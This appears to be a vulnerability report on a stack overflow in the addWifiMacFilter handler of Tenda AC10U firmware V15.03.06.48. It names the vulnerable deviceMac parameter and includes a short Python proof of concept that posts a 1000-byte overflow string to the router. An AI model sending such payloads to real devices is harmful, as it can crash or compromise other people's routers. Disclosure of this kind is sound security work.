- Firmware download website: https://www.tendacn.com/download/detail-3170.html
AC10U v1.0 Firmware V15.03.06.48
The Tenda AC10U v1.0 V15.03.06.48 firmware has a stack overflow vulnerability in the addWifiMacFilter function. The device_mac variable receives the deviceMac parameter from a POST request. The value is directly used in a sprintf function and passes to a local variable on the stack, which can override the return address of the function. The user-provided deviceMac can trigger this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/addWifiMacFilter"
payload = b"a"*1000
data = {"deviceMac": payload, "deviceId":1}
response = requests.post(url, data=data)
print(response.text)